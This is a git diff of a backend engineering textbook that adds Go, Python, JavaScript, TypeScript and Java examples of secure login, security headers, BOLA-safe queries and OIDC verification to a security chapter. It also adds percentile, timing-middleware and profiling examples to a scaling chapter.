+    directives: {
+      defaultSrc: ["'self'"],
+      scriptSrc: ["'self'"],   // no 'unsafe-inline': that voids the CSP
+      objectSrc: ["'none'"],
+      frameAncestors: ["'none'"], // the modern X-Frame-Options
+    },
+  },
+  strictTransportSecurity: { maxAge: 63_072_000, includeSubDomains: true, preload: true },
+  referrerPolicy: { policy: 'strict-origin-when-cross-origin' },
+}
+
+app.use(helmet(SECURITY))
+
+// Roll a CSP out with Content-Security-Policy-Report-Only first. A
+// strict policy on an existing app breaks something almost every time,
+// and report-only tells you what without taking the site down.
+```
+
+```java title="Spring Security headers"
+// Spring Security sets most of these by DEFAULT the moment it is on the
+// classpath: X-Content-Type-Options, X-Frame-Options: DENY, and cache
+// control. CSP and HSTS preload are the two you configure yourself.
+@Bean
+SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+    return http
+        .headers(headers -> headers
+            .frameOptions(frame -> frame.deny())
+            .contentTypeOptions(Customizer.withDefaults())
+            .referrerPolicy(ref -> ref.policy(
+                ReferrerPolicy.STRICT_ORIGIN_WHEN_CROSS_ORIGIN))
+            .httpStrictTransportSecurity(hsts -> hsts
+                .maxAgeInSeconds(63_072_000)
+                .includeSubDomains(true)
+                .preload(true))
+            .contentSecurityPolicy(csp -> csp
+                .policyDirectives("default-src 'self'; script-src 'self'; object-src 'none'"))
+        )
+        .build();
+}
 ```
 
 13
@@ -675,12 +1552,18 @@ If you ask these three questions for every piece of code that handles user input
 
 14
 
-## Go: Secure Patterns Reference
+## Secure Patterns Reference
+
+Everything from this chapter, assembled. Read one tab end to end and you have the whole checklist in one place: validate the shape, query with parameters, verify in constant time, answer with a **generic** error either way, mint the session id from a CSPRNG, and set all three cookie flags.
 
 ### Complete Secure Login Endpoint
 
-```go
-Gofunc loginHandler(db *pgxpool.Pool, redis *redis.Client) http.HandlerFunc {
+Go Python JavaScript TypeScript Java
+
+validate, parameterise, verify, generic error, CSPRNG token, flagged cookie
+
+```go title="the complete secure login endpoint"
+func loginHandler(db *pgxpool.Pool, redis *redis.Client) http.HandlerFunc {
     return func(w http.ResponseWriter, r *http.Request) {
         var req struct {
             Email    string `json:"email"`
@@ -732,12 +1615,8 @@ func generateSecureToken(n int) string {
 }
 ```
 
-15
-
-## Python: Secure Patterns Reference
-
-```python
-Python / FastAPI Secure Authfrom fastapi import FastAPI, HTTPException, Response
+```python title="FastAPI secure auth"
+from fastapi import FastAPI, HTTPException, Response
 from argon2 import PasswordHasher
 from argon2.exceptions import VerifyMismatchError
 import secrets
@@ -776,8 +1655,194 @@ async def login(email: str, password: str, response: Response):
     return {"status": "ok"}
 ```
 
-```python
-Python / BOLA-safe DB queryasync def get_invoice(invoice_id: int, current_user_id: int):
+```js title="Express secure login"
+import { randomBytes } from 'node:crypto'
+import argon2 from 'argon2'
+
+app.post('/login', loginLimiter, async (req, res) => {
+  const { email, password } = req.body ?? {}
+
+  // 1. Validate format (first line of defence)
+  if (typeof email !== 'string' || typeof password !== 'string' ||
+      !isValidEmail(email) || password.length < 8) {
+    return res.status(400).json({ error: 'invalid credentials' })
+  }
+
+  // 2. Parameterised query, no SQL injection possible
+  const { rows } = await db.query(
+    'SELECT id, password_hash FROM users WHERE email = $1', [email])
+  const user = rows[0]
+
+  // 3. Generic error, never reveal whether the email exists.
+  //    Note the dummy verify: skipping the hash when the user is not
+  //    found returns in 1ms instead of 100ms, and that timing
+  //    difference is a working account-enumeration oracle.
+  const hash = user?.password_hash ?? DUMMY_HASH
+  const valid = (await argon2.verify(hash, password)) && user !== undefined
+
+  if (!valid) {
+    return res.status(401).json({ error: 'invalid email or password' })
+  }
+
+  // 4. Cryptographically secure session ID (crypto, never Math.random)
+  const sessionId = randomBytes(32).toString('base64url')
+
+  // 5. Store session in Redis with a TTL
+  await redis.set(`session:${sessionId}`, user.id, { EX: 7 * 24 * 3600 })
+
+  // 6. Secure cookie: HttpOnly, Secure, SameSite=Strict
+  res.cookie('session_id', sessionId, {
+    httpOnly: true,
+    secure: true,
+    sameSite: 'strict',
+    maxAge: 7 * 24 * 3600 * 1000,
+  })
+
+  res.sendStatus(200)
+})
+```
+
+```ts title="Express secure login"
+import { randomBytes } from 'node:crypto'
+import { z } from 'zod'
+import argon2 from 'argon2'
+import type { Request, Response } from 'express'
+
+// 1. Validate format as a SCHEMA, so the shape check and the type come
+//    from one declaration and cannot drift apart.
+const LoginBody = z.object({
+  email: z.string().email(),
+  password: z.string().min(8),
+})
+
+export async function login(req: Request, res: Response): Promise<void> {
+  const parsed = LoginBody.safeParse(req.body)
+  if (!parsed.success) {
+    res.status(400).json({ error: 'invalid credentials' })
+    return
+  }
+  const { email, password } = parsed.data
+
+  // 2. Parameterised query, no SQL injection possible
+  const { rows } = await db.query<{ id: string; password_hash: string }>(
+    'SELECT id, password_hash FROM users WHERE email = $1', [email])
+  const user = rows[0]
+
+  // 3. Constant-time-ish: always run the hash, so a missing user takes
+  //    the same ~100ms as a wrong password. Generic error either way.
+  const hash = user?.password_hash ?? DUMMY_HASH
+  const ok = await argon2.verify(hash, password).catch(() => false)
+
+  if (!ok || user === undefined) {
+    res.status(401).json({ error: 'invalid email or password' })
+    return
+  }
+
+  // 4. 32 bytes = 256 bits from the CSPRNG. Math.random() is seeded and
+  //    predictable, and a predictable session id is a full account
+  //    takeover, not a theoretical weakness.
+  const sessionId = randomBytes(32).toString('base64url')
+
+  // 5 + 6. Store server-side, hand out only the opaque id
+  await redis.set(`session:${sessionId}`, user.id, { EX: 7 * 24 * 3600 })
+  res.cookie('session_id', sessionId, SESSION_COOKIE) // see sec 06
+  res.sendStatus(200)
+}
+```
+
+```java title="Spring Boot secure login"
+@RestController
+class AuthController {
+    private static final SecureRandom RANDOM = new SecureRandom();
+
+    private final JdbcClient db;
+    private final PasswordEncoder encoder;
+    private final StringRedisTemplate redis;
+
+    @PostMapping("/login")
+    ResponseEntity<?> login(@Valid @RequestBody LoginRequest req,
+                            HttpServletResponse response) {
+        // 1. Validate format: @Valid + the record's own constraints did
+        //    it before this method ran. See chapter 05.
+
+        // 2. Parameterised query, no SQL injection possible
+        Optional<UserRow> user = db.sql(
+                "SELECT id, password_hash FROM users WHERE email = ?")
+            .param(req.email())
+            .query(UserRow.class)
+            .optional();
+
+        // 3. Always run the hash, even when the user is absent, so the
+        //    response time does not reveal which emails are registered.
+        String hash = user.map(UserRow::passwordHash).orElse(DUMMY_HASH);
+        boolean valid = encoder.matches(req.password(), hash) && user.isPresent();
+
+        if (!valid) {
+            // Generic error, never reveal whether the email exists
+            return ResponseEntity.status(401)
+                .body(Map.of("error", "invalid email or password"));
+        }
+
+        // 4. Cryptographically secure session ID. SecureRandom, never
+        //    java.util.Random, whose seed is guessable from two outputs.
+        byte[] bytes = new byte[32];
+        RANDOM.nextBytes(bytes);
+        String sessionId = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
+
+        // 5. Store session in Redis with a TTL
+        redis.opsForValue().set("session:" + sessionId, user.get().id(),
+            Duration.ofDays(7));
+
+        // 6. Secure cookie: HttpOnly, Secure, SameSite=Strict
+        ResponseCookie cookie = ResponseCookie.from("session_id", sessionId)
+            .httpOnly(true).secure(true).sameSite("Strict")
+            .maxAge(Duration.ofDays(7)).path("/")
+            .build();
+        response.addHeader(HttpHeaders.SET_COOKIE, cookie.toString());
+
+        return ResponseEntity.ok().build();
+    }
+}
+
+// Record it, whichever way it went. A failed login that nobody can see
+// is a brute-force attempt nobody can alert on.
+```
+
+### The BOLA-safe query
+
+Go Python JavaScript TypeScript Java
+
+the ownership check belongs IN the WHERE clause, not after the row comes back
+
+```go title="BOLA-safe DB query"
+func GetInvoice(ctx context.Context, db *pgxpool.Pool,
+    invoiceID int64, currentUserID string) (*Invoice, error) {
+
+    var inv Invoice
+    // Ownership check IN the query, not after it. Fetching first and
+    // comparing afterwards works right up until somebody adds an early
+    // return, or logs the row, or the comparison is against the wrong
+    // field. In the WHERE clause it cannot be skipped.
+    err := db.QueryRow(ctx, `
+        SELECT id, amount, user_id
+        FROM   invoices
+        WHERE  id = $1 AND user_id = $2`,
+        invoiceID, currentUserID,
+    ).Scan(&inv.ID, &inv.Amount, &inv.UserID)
+
+    if errors.Is(err, pgx.ErrNoRows) {
+        // 404, not 403. A 403 confirms the invoice EXISTS, which hands
+        // an attacker a working oracle for enumerating other people's
+        // ids one request at a time.
+        return nil, apperr.NotFound("invoice")
+    }
+    return &inv, err
+}
+```
+
+```python title="BOLA-safe DB query"
+```python title="BOLA-safe DB query"
+async def get_invoice(invoice_id: int, current_user_id: int):
     # ownership check IN the query, not after
     row = await db.fetchrow(
         "SELECT * FROM invoices WHERE id=$1 AND user_id=$2",
@@ -787,6 +1852,75 @@ Python / BOLA-safe DB queryasync def get_invoice(invoice_id: int, current_user_i
         # 404, not 403. Don't confirm the invoice exists.
         raise HTTPException(404, "invoice not found")
     return row
+```
+
+```js title="BOLA-safe DB query"
+export async function getInvoice(invoiceId, currentUserId) {
+  // Ownership check IN the query, not after
+  const { rows } = await db.query(
+    'SELECT * FROM invoices WHERE id = $1 AND user_id = $2',
+    [invoiceId, currentUserId],
+  )
+
+  if (rows.length === 0) {
+    // 404, not 403. Don't confirm the invoice exists.
+    throw notFound('invoice')
+  }
+  return rows[0]
+}
+
+// The currentUserId comes from the SESSION, never from the request. An
+// id taken from the body or a query param is not an ownership check at
+// all, it is the attacker telling you who to pretend they are.
+```
+
+```ts title="BOLA-safe DB query"
+// Making the caller pass the viewer explicitly, as a required argument,
+// is the structural version of this rule: a repository method that
+// cannot be called without a user id is one nobody can accidentally
+// call without the ownership filter.
+export async function getInvoice(
+  invoiceId: number,
+  currentUserId: string, // required, and it comes from the session
+): Promise<Invoice> {
+  const { rows } = await db.query<Invoice>(
+    'SELECT id, amount, user_id FROM invoices WHERE id = $1 AND user_id = $2',
+    [invoiceId, currentUserId],
+  )
+
+  const invoice = rows[0]
+  if (invoice === undefined) {
+    // 404, not 403. A 403 confirms the row exists and turns the endpoint
+    // into an enumeration oracle for other users' invoice ids.
+    throw notFound('invoice')
+  }
+  return invoice
+}
+```
+
+```java title="BOLA-safe DB query"
+public Invoice getInvoice(long invoiceId, String currentUserId) {
+    // Ownership check IN the query, not after
+    return db.sql("""
+            SELECT id, amount, user_id
+            FROM   invoices
+            WHERE  id = ? AND user_id = ?
+            """)
+        .params(invoiceId, currentUserId)
+        .query(Invoice.class)
+        .optional()
+        // 404, not 403. Don't confirm the invoice exists.
+        .orElseThrow(() -> new ResponseStatusException(
+            HttpStatus.NOT_FOUND, "invoice not found"));
+}
+
+// With Spring Data, the same rule is expressed in the method name, and
+// it is worth preferring for exactly that reason: findById(id) is one
+// keystroke away and is the vulnerable version.
+//   Optional<Invoice> findByIdAndUserId(long id, String userId);
+
+// The currentUserId must come from the SecurityContext, never from the
+// request:  SecurityContextHolder.getContext().getAuthentication()
 ```
 
 16
@@ -829,8 +1963,12 @@ This is the flow used by every serious web application. It keeps tokens off the 
 | **OAuth 2.0** | "What can this app do?" | Access Token (opaque or JWT)                     |
 | **OIDC**      | "Who is this user?"     | ID Token (always JWT with `sub`, `email`, `iat`) |
 
-```go
-Go / Verify OIDC ID Token (google/go-oidc)import (
+Go Python JavaScript TypeScript Java
+
+check the state, exchange the code server-side, then VERIFY the ID token
+
+```go title="verify an OIDC ID token / go-oidc"
+import (
     "github.com/coreos/go-oidc/v3/oidc"
     "golang.org/x/oauth2"
 )
@@ -872,6 +2010,168 @@ func callbackHandler(w http.ResponseWriter, r *http.Request) {
 }
 ```
 
+```python title="verify an OIDC ID token / authlib"
+from authlib.integrations.starlette_client import OAuth
+
+oauth = OAuth()
+oauth.register(
+    name="google",
+    server_metadata_url="https://accounts.google.com/.well-known/openid-configuration",
+    client_id=os.environ["GOOGLE_CLIENT_ID"],
+    client_secret=os.environ["GOOGLE_CLIENT_SECRET"],
+    client_kwargs={"scope": "openid email profile"},
+)
+
+
+@app.get("/auth/login")
+async def login(request: Request):
+    # authlib generates and stores `state` (and the PKCE verifier) itself
+    return await oauth.google.authorize_redirect(
+        request, "https://yourapp.com/auth/callback")
+
+
+@app.get("/auth/callback")
+async def callback(request: Request):
+    # 1 + 2 + 3. state check, code exchange and ID-token verification
+    # (signature, iss, aud, exp) all happen inside authorize_access_token.
+    # Doing any of them by hand is how people get this wrong.
+    token = await oauth.google.authorize_access_token(request)
+
+    # 4. Extract claims
+    claims = token["userinfo"]
+
+    # 5. Upsert user, create session, set cookie
+    user_id = await upsert_user(claims["sub"], claims["email"])
+    return set_secure_session_cookie(user_id)
+```
+
+```js title="verify an OIDC ID token / openid-client"
+import * as client from 'openid-client'
+
+const config = await client.discovery(
+  new URL('https://accounts.google.com'),
+  process.env.GOOGLE_CLIENT_ID,
+  process.env.GOOGLE_CLIENT_SECRET,
+)
+
+app.get('/auth/login', async (req, res) => {
+  const codeVerifier = client.randomPKCECodeVerifier()
+  const state = client.randomState()
+
+  // Both go in the SESSION, never in a cookie the client can edit
+  req.session.codeVerifier = codeVerifier
+  req.session.state = state
+
+  res.redirect(client.buildAuthorizationUrl(config, {
+    redirect_uri: 'https://yourapp.com/auth/callback',
+    scope: 'openid email profile',
+    state,
+    code_challenge: await client.calculatePKCECodeChallenge(codeVerifier),
+    code_challenge_method: 'S256',
+  }).href)
+})
+
+app.get('/auth/callback', async (req, res) => {
+  // 1, 2 and 3: the library checks state, exchanges the code
+  // server-to-server, and verifies the ID token's signature, iss, aud
+  // and exp. Never decode an ID token with jwt.decode() and trust it:
+  // decoding is not verifying, and an unverified token is attacker input.
+  const tokens = await client.authorizationCodeGrant(config, new URL(req.url, BASE), {
+    pkceCodeVerifier: req.session.codeVerifier,
+    expectedState: req.session.state,
+  })
+
+  // 4. Extract claims
+  const claims = tokens.claims()
+
+  // 5. Upsert user, create session, set cookie
+  const userId = await upsertUser(claims.sub, claims.email)
+  setSecureSessionCookie(res, userId)
+  res.redirect('/dashboard')
+})
+```
+
+```ts title="verify an OIDC ID token / openid-client"
+import * as client from 'openid-client'
+import type { Request, Response } from 'express'
+
+// Typing the claims you actually rely on is worth doing, because the
+// set varies by provider: `email_verified` is present for Google and
+// absent for some others, and treating a missing value as "verified"
+// lets anyone register an account with someone else's address.
+interface IdTokenClaims {
+  sub: string
+  email: string
+  email_verified?: boolean
+}
+
+export async function callback(req: Request, res: Response): Promise<void> {
+  const tokens = await client.authorizationCodeGrant(
+    config,
+    new URL(req.url, process.env.BASE_URL!),
+    {
+      pkceCodeVerifier: req.session.codeVerifier!,
+      expectedState: req.session.state!,
+    },
+  )
+
+  const claims = tokens.claims() as unknown as IdTokenClaims
+
+  // `sub` is the stable identifier, NOT the email. An email can be
+  // changed or reassigned at the provider; keying your user rows on it
+  // eventually merges two people into one account.
+  if (claims.email_verified !== true) {
+    res.status(403).send('email not verified')
+    return
+  }
+
+  const userId = await upsertUser(claims.sub, claims.email)
+  setSecureSessionCookie(res, userId)
+  res.redirect('/dashboard')
+}
+```
+
+```java title="OIDC login / Spring Security"
+// Spring Security implements the entire Authorization Code flow,
+// including state, PKCE and full ID-token validation. The correct
+// amount of security code to write here is close to zero.
+//
+//   implementation 'org.springframework.boot:spring-boot-starter-oauth2-client'
+//
+//   spring.security.oauth2.client:
+//     registration.google:
+//       client-id: ${GOOGLE_CLIENT_ID}
+//       client-secret: ${GOOGLE_CLIENT_SECRET}
+//       scope: openid,email,profile
+//     provider.google:
+//       issuer-uri: https://accounts.google.com
+
+@Bean
+SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+    return http
+        .authorizeHttpRequests(auth -> auth
+            .requestMatchers("/", "/login/**").permitAll()
+            .anyRequest().authenticated())
+        .oauth2Login(oauth -> oauth
+            .defaultSuccessUrl("/dashboard", true)
+            .userInfoEndpoint(u -> u.oidcUserService(this::loadUser)))
+        .build();
+}
+
+// The only part worth writing yourself: mapping the verified claims
+// onto your own user row.
+private OidcUser loadUser(OidcUserRequest request) {
+    OidcUser oidcUser = new OidcUserService().loadUser(request);
+
+    // `sub` is the stable id. Never key your users table on email.
+    String userId = upsertUser(
+        oidcUser.getSubject(),
+        oidcUser.getEmail());
+
+    return oidcUser;
+}
+```
+
 17
 
 ## HTTPS & TLS Internals
@@ -910,8 +2210,8 @@ HTTPS is HTTP with a TLS (Transport Layer Security) layer between the TCP connec
 - Disable TLS 1.0 and TLS 1.1, they have known vulnerabilities (POODLE, BEAST). Only allow TLS 1.2 and TLS 1.3.
 - Test your TLS config at [ssllabs.com/ssltest](https://www.ssllabs.com/ssltest/), aim for an A+ rating.
 
-```text
-Caddy / Automatic HTTPS (zero config)# Caddyfile, Caddy automatically obtains and renews Let's Encrypt certs
+```caddy title="Caddy / automatic HTTPS, zero config"
+# Caddyfile, Caddy automatically obtains and renews Let's Encrypt certs
 yourapp.com {
     reverse_proxy localhost:8080
     # TLS 1.2+ enforced, HSTS set, HTTP redirected, all automatic
@@ -981,8 +2281,8 @@ The mindset shift that matters most: stop thinking "will users do this?" and sta
 
 ### Automated Security Testing in CI/CD
 
-```bash
-GitHub Actions / Security scan on every PRname: Security Scan
+```yaml title=".github/workflows/security.yaml / scan on every PR"
+name: Security Scan
 on: [pull_request]
 
 jobs:
@@ -1099,4 +2399,4 @@ Attackers stole encrypted password vaults of all LastPass customers. Ongoing bru
 
 Backend Field Manual / Backend Security / Chapter 17 (Extended)
 
-Backend from First Principles / Chapter 17 / Security. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 17 / Security. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/18-scaling-and-performance-part-1.mdx
+++ b/src/content/chapters/18-scaling-and-performance-part-1.mdx
@@ -2,7 +2,7 @@
 order: 18
 title: "Mastering Scaling & Performance"
 navTitle: "Scaling & Performance (Part 1)"
-summary: "Chapter 18 of Backend from First Principles: Scaling & Performance (Part 1)."
+summary: "What \"fast\" actually means and how to make it so: latency percentiles, throughput and queuing, finding the real bottleneck with profilers and traces, then the four fixes that account for most wins, N+1 queries, indexes, connection pooling and caching. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "scaling"
@@ -63,12 +63,15 @@ A percentile tells you the latency threshold below which a certain percentage of
 
 Backend engineers focus on tail latencies (P95/P99) for two reasons. First, the requests that land in the tail are typically the most _complex_, they involve the heaviest business logic, the most joins, or the most service-to-service calls. Second, these requests often represent your most _valuable_ users: someone making a purchase, generating a report, or completing a checkout flow, exactly the workflows where a 5-second hang loses revenue and trust.
 
-### Measuring percentiles in Go
+### Measuring percentiles
 
-The Go standard library doesn't ship a percentile calculator, but you can compute them from sorted slices or use a library. Here's a simple implementation from scratch:
+Some languages ship a percentile function and some do not, but the algorithm is three lines either way: sort the samples, compute the index, read it off. What matters far more than the implementation is that you record the **whole distribution**, not an average, because an average hides exactly the tail you care about.
+
+Go Python JavaScript TypeScript Java
+
+sort, index, read off: P50, P90, P99
 
 ```go
-Go
 package main
 
 import (
@@ -111,10 +114,7 @@ func main() {
 }
 ```
 
-### Measuring percentiles in Python
-
-```text
-Python
+```python
 import numpy as np
 
 # Simulated latency samples (in milliseconds)
@@ -124,6 +124,72 @@ print(f"P50:  {np.percentile(samples, 50):.0f}ms")
 print(f"P90:  {np.percentile(samples, 90):.0f}ms")
 print(f"P99:  {np.percentile(samples, 99):.0f}ms")
 print(f"P99.9:{np.percentile(samples, 99.9):.0f}ms")
+
+# Without numpy, the standard library has had it since 3.8:
+#   from statistics import quantiles
+#   quantiles(samples, n=100)[98]   # P99
+```
+
+```js
+// Simulated latency samples (in milliseconds)
+const samples = [12, 15, 22, 48, 95, 110, 340, 890, 1200, 4800]
+
+function percentile(values, p) {
+  const sorted = [...values].sort((a, b) => a - b) // NOT .sort(): that is
+  //                                                  lexicographic, so
+  //                                                  1200 would sort
+  //                                                  before 48
+  const index = Math.ceil((p / 100) * sorted.length) - 1
+  return sorted[Math.max(0, index)]
+}
+
+console.log(`P50:  ${percentile(samples, 50)}ms`)
+console.log(`P90:  ${percentile(samples, 90)}ms`)
+console.log(`P99:  ${percentile(samples, 99)}ms`)
+```
+
+```ts
+// The signature is the teaching point: a percentile needs the WHOLE
+// sample set, and taking `number[]` rather than a running average makes
+// that structural. You cannot compute a P99 from a mean, ever, and an
+// API that accepts one is an API that will be asked to.
+function percentile(values: readonly number[], p: number): number {
+  const sorted = [...values].sort((a, b) => a - b)
+  const index = Math.ceil((p / 100) * sorted.length) - 1
+  return sorted[Math.max(0, index)]
+}
+
+const samples: readonly number[] = [12, 15, 22, 48, 95, 110, 340, 890, 1200, 4800]
+
+for (const p of [50, 90, 99] as const) {
+  console.log(`P${p}:  ${percentile(samples, p)}ms`)
+}
+
+// In production you do not hold every sample in memory: Prometheus
+// histograms and t-digest / HDRHistogram compute approximate quantiles
+// in fixed space. The maths below is for understanding, not for scale.
+```
+
+```java
+// Simulated latency samples (in milliseconds)
+long[] samples = {12, 15, 22, 48, 95, 110, 340, 890, 1200, 4800};
+
+static long percentile(long[] values, double p) {
+    long[] sorted = values.clone(); // sort a COPY; Arrays.sort mutates
+    Arrays.sort(sorted);
+    int index = (int) Math.ceil(p / 100.0 * sorted.length) - 1;
+    return sorted[Math.max(0, index)];
+}
+
+System.out.printf("P50:  %dms%n", percentile(samples, 50));
+System.out.printf("P90:  %dms%n", percentile(samples, 90));
+System.out.printf("P99:  %dms%n", percentile(samples, 99));
+
+// In production, Micrometer's Timer does this for you and exports the
+// buckets to Prometheus:
+//   Timer.builder("http.server.requests")
+//        .publishPercentiles(0.5, 0.9, 0.99)
+//        .register(registry);
 ```
 
 <Callout type="info">
@@ -194,12 +260,15 @@ Now you add timing measurements throughout the code and discover: the database q
 **Never guess. Always measure.** Common hidden bottlenecks include: synchronous logging to remote services, JSON/XML serialization of large payloads, external API calls in loops, large response payloads causing slow network transmission, and middleware that runs on every request.
 </Callout>
 
-### Timing middleware in Go
+### Timing middleware
 
 Here's a practical middleware that logs per-request timing, so you can start identifying slow endpoints:
 
+Go Python JavaScript TypeScript Java
+
+wrap every request, log method, path, status and duration
+
 ```go
-Go
 package middleware
 
 import (
@@ -236,10 +305,7 @@ func (w *statusWriter) WriteHeader(code int) {
 }
 ```
 
-### Timing decorator in Python (FastAPI)
-
 ```python
-Python
 import time
 import logging
 from fastapi import Request
@@ -260,6 +326,80 @@ class TimingMiddleware(BaseHTTPMiddleware):
         return response
 ```
 
+```js
+// TimingMiddleware logs the duration of every HTTP request.
+export function timingMiddleware(req, res, next) {
+  const start = process.hrtime.bigint() // monotonic; Date.now() can jump
+                                        // backwards when NTP corrects
+
+  // No wrapper needed: 'finish' fires after the response is written, and
+  // res.statusCode is final by then.
+  res.on('finish', () => {
+    const durationMs = Number(process.hrtime.bigint() - start) / 1e6
+    console.log(
+      `method=${req.method} path=${req.route?.path ?? req.path} ` +
+      `status=${res.statusCode} duration=${durationMs.toFixed(1)}ms`,
+    )
+  })
+
+  next()
+}
+```
+
+```ts
+import type { NextFunction, Request, Response } from 'express'
+
+export function timingMiddleware(req: Request, res: Response, next: NextFunction): void {
+  const start = process.hrtime.bigint()
+
+  // Listen for BOTH: 'finish' means the response was sent, 'close' means
+  // the client hung up first. Timing only 'finish' silently drops every
+  // abandoned request, which is exactly the slow tail you are hunting.
+  const record = (outcome: 'finish' | 'close'): void => {
+    const durationMs = Number(process.hrtime.bigint() - start) / 1e6
+    console.log(
+      `method=${req.method} path=${req.route?.path ?? req.path} ` +
+      `status=${res.statusCode} outcome=${outcome} duration=${durationMs.toFixed(1)}ms`,
+    )
+  }
+
+  res.once('finish', () => record('finish'))
+  res.once('close', () => { if (!res.writableEnded) record('close') })
+
+  next()
+}
+```
+
+```java
+// A servlet Filter logs the duration of every HTTP request.
+@Component
+public class TimingFilter extends OncePerRequestFilter {
+    private static final Logger log = LoggerFactory.getLogger(TimingFilter.class);
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        long start = System.nanoTime(); // nanoTime, not currentTimeMillis:
+                                        // only nanoTime is monotonic
+
+        try {
+            chain.doFilter(req, res);
+        } finally {
+            // In a finally block, so a request that threw is still timed.
+            // Those are usually the interesting ones.
+            long durationMs = (System.nanoTime() - start) / 1_000_000;
+            log.info("method={} path={} status={} duration={}ms",
+                req.getMethod(), req.getRequestURI(), res.getStatus(), durationMs);
+        }
+    }
+}
+
+// Spring Boot Actuator already records this as a Micrometer Timer
+// (http_server_requests_seconds) with percentiles, so in a real service
+// prefer that over hand-rolled logging. See chapter 15.
+```
+
 ## Profiling & Flame Graphs
 
 Profiling is the practice of measuring exactly where your application spends its time. A profiler attaches to your running application, samples the call stack at regular intervals, and records which functions are executing, how long they run, and how much CPU or memory they consume.
@@ -276,10 +416,13 @@ Raw profiler output can list thousands of functions, each accounting for some fr
 <svg viewBox="0 0 600 180" xmlns="http://www.w3.org/2000/svg" style="max-width:600px;width:100%"><rect x="10" y="140" width="580" height="28" rx="3" fill="var(--dg-accent-tint)" stroke="var(--dg-accent)" stroke-width="1"></rect><text x="300" y="158" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="10" fill="var(--dg-ink-2)">main.handleRequest(), 100%</text><rect x="10" y="108" width="90" height="28" rx="3" fill="var(--dg-info-tint)" stroke="var(--dg-info)" stroke-width="1"></rect><text x="55" y="126" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-info-soft)">parseJSON</text><text x="55" y="136" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">8%</text><rect x="100" y="108" width="60" height="28" rx="3" fill="var(--dg-ok-tint)" stroke="var(--dg-ok)" stroke-width="1"></rect><text x="130" y="126" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-ok-soft)">auth</text><text x="130" y="136" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">5%</text><rect x="160" y="108" width="140" height="28" rx="3" fill="var(--dg-accent-tint)" stroke="var(--dg-accent)" stroke-width="1"></rect><text x="230" y="126" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-accent-2)">db.QueryProducts</text><text x="230" y="136" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">12%</text><rect x="300" y="108" width="260" height="28" rx="3" fill="var(--dg-accent-surface)" stroke="var(--dg-accent)" stroke-width="1.5"></rect><text x="430" y="126" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" font-weight="600" fill="var(--dg-accent-2)">logging.SendRemote </text><text x="430" y="136" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-accent)" font-weight="600">70% &#x3C;- BOTTLENECK</text><rect x="300" y="76" width="180" height="28" rx="3" fill="var(--dg-accent-tint)" stroke="var(--dg-accent-soft)" stroke-width="1"></rect><text x="390" y="94" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-accent-soft)">net.http.Post</text><text x="390" y="104" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">55%</text><rect x="480" y="76" width="80" height="28" rx="3" fill="var(--dg-plum-tint)" stroke="var(--dg-plum)" stroke-width="1"></rect><text x="520" y="94" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-plum)">serialize</text><text x="520" y="104" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">15%</text><rect x="300" y="44" width="120" height="28" rx="3" fill="var(--dg-accent-tint)" stroke="var(--dg-accent-soft)" stroke-width="1"></rect><text x="360" y="62" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="8" fill="var(--dg-accent-soft)">tcp.Dial</text><text x="360" y="72" text-anchor="middle" font-family="var(--font-diagram-mono)" font-size="7" fill="var(--dg-ink-2)">40%</text></svg>
 </Diagram>
 
-### CPU profiling in Go with pprof
+### CPU profiling
+
+Go Python JavaScript TypeScript Java
+
+sample the stack, aggregate, render a flame graph
 
 ```go
-Go
 import (
     "net/http"
     _ "net/http/pprof"  // side-effect import: registers /debug/pprof/
@@ -295,10 +438,7 @@ func main() {
 }
 ```
 
-### CPU profiling in Python
-
-```text
-Python
+```python
 import cProfile
 import pstats
 
@@ -313,6 +453,89 @@ stats.print_stats(20)
 # For flame graphs, use py-spy (external tool):
 #   pip install py-spy
 #   py-spy record -o profile.svg -- python app.py
+#
+# py-spy's real advantage: it attaches to a RUNNING process by pid, so
+# you can profile the production container that is misbehaving right now
+# without redeploying it:  py-spy dump --pid 1
+```
+
+```js
+// Node has a sampling profiler built into the runtime.
+//
+//   node --cpu-prof --cpu-prof-dir=./profiles app.js
+//     -> writes a .cpuprofile you open in Chrome DevTools (Performance)
+//
+// For a running process, send it the inspector signal and attach:
+//   kill -SIGUSR1 <pid>
+//   then open chrome://inspect
+
+// Programmatically, when you want to profile one specific operation:
+import inspector from 'node:inspector/promises'
+
+const session = new inspector.Session()
+session.connect()
+
+await session.post('Profiler.enable')
+await session.post('Profiler.start')
+
+await handleRequest() // your function under test
+
+const { profile } = await session.post('Profiler.stop')
+await writeFile('profile.cpuprofile', JSON.stringify(profile))
+
+// Node caveat that catches everyone: a CPU profile of an IO-bound server
+// is almost entirely idle, because the time is spent WAITING, not
+// computing. If the flame graph is flat, you have an IO problem, and
+// the next section is the one you want.
+```
+
+```ts
+// The same built-in profiler, plus the one measurement that matters most
+// in Node and has no equivalent in the other tabs: EVENT LOOP LAG.
+//
+// A blocked event loop does not show up as slow code in any single
+// handler; it shows up as EVERY handler getting slower at once, which is
